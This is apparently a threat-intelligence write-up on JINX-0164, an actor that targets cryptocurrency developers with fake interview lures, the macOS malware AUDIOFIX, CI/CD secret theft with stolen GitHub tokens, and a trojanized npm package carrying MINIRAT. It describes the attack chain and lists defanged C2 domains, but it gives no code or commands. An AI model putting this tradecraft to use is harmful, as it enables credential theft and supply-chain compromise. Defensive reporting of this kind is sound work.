From AUDIOFIX to MINIRAT: JINX-0164’s macOS and Supply Chain Compromise Lifecycle

A sophisticated new threat actor, tracked as JINX-0164, has emerged with a highly specialized focus on the cryptocurrency sector. Unlike generic malware campaigns, this actor utilizes a precision-engineered attack lifecycle that bridges the gap between social engineering and deep-tier software supply chain compromise.

By targeting the very individuals responsible for maintaining critical infrastructure—software developers—JINX-0164 has demonstrated an ability to pivot from individual macOS endpoints into highly sensitive CI/CD (Continuous Integration/Continuous Deployment) environments. This transition allows the actor to move beyond simple data theft and toward the systematic corruption of software distribution pipelines.

The Attack Lifecycle: From LinkedIn Lures to AUDIOFIX Deployment

The intrusion methodology begins with high-fidelity social engineering. The group leverages recruitment-themed lures on professional networks like LinkedIn, impersonating legitimate business contacts to build rapport with high-value targets. A typical engagement involves an invitation to a virtual technical interview or business meeting.

During these interactions, victims are redirected to a malicious domain designed to mimic legitimate collaboration tools, such as Microsoft Teams. Upon downloading what appears to be a necessary conferencing client, the victim unwittingly executes a multi-stage infection chain:

1. Initial Execution: A bash script, hosted on a spoofed Apple driver domain, triggers the deployment of a Python-based macOS malware known as AUDIOFIX.
2. Persistence Mechanism: The malware disguises itself as a legitimate system component named coreaudiod and utilizes launchctl to ensure it persists across system reboots.
3. C2 Communication: Once active, the malware establishes encrypted command-and-control (C2) channels over HTTPS.

According to research by Wiz, JINX-0164 has been operational since mid-2025. The group is primarily financially motivated, specifically engineered to harvest macOS Keychain credentials, SSH keys, cloud provider tokens, and cryptocurrency wallet data. They have even been observed using XOR-encoded local storage to stage stolen passwords for later exfiltration.

Lateral Movement and CI/CD Pipeline Hijacking

What distinguishes JINX-0164 from standard credential harvesters is their methodology for lateral movement. Rather than focusing solely on cloud permission escalation, they target the integrity of the development workflow itself.

By leveraging stolen GitHub tokens, the attackers utilize tools like nord-stream to extract secrets directly from CI/CD pipelines. They then inject malicious code into legitimate repositories. A key forensic indicator of this activity is the presence of unverified badges on commits—a mismatch where the GPG key used to sign the commit does not align with the listed author’s historical identity.

This creates a “propagation vector” effect: as developers pull the compromised code to their local machines or build servers, the infection spreads organically throughout the organization’s ecosystem. Fortunately, GitHub’s Vigilant Mode has proven effective in flagging these identity mismatches.

Supply Chain Weaponization: The @velora-dex/sdk Incident

The group’s capabilities extend into direct package poisoning. On April 7, 2026, JINX-0164 successfully trojanized version 4.9.1 of the npm package @velora-dex/sdk. The payload utilized a base64-encoded command to fetch and execute a remote script, deploying MINIRAT—a lightweight, Go-based backdoor.

While AUDIOFIX is designed for heavy data exfiltration, MINIRAT is optimized for stealthy persistence and remote command execution, providing the actor with a secondary, more discreet foothold.

Infrastructure analysis reveals shared C2 domains such as datahub[.]ink, cloud-sync[.]online, and byte-io[.]us. The actors also utilize commercial VPNs—including Mullvad and Astrill—to mask their origins across SaaS and cloud environments.

Threat Intelligence Summary & Recommendations

While JINX-0164 shares tactical overlaps with North Korean clusters such as UNC1069 or Sapphire Sleet, current intelligence suggests a unique infrastructure, marking them as a distinct, highly capable threat actor. Their strategic pivot toward macOS and developer-centric workflows represents a significant escalation in supply chain risk.

Recommended Defensive Posture:

• Audit CI/CD Integrity: Monitor for unauthorized GitHub Actions and unverified GPG signatures on commits.
• Endpoint Monitoring: Watch for suspicious launchctl activity and unexpected Python-based processes on macOS endpoints.
• Network Hygiene: Flag unusual VPN traffic and monitor for connections to known malicious domains.
• Dependency Management: Implement strict version pinning and integrity checking for third-party packages (npm, PyPI, etc.).

Indicators of Compromise (IOCs)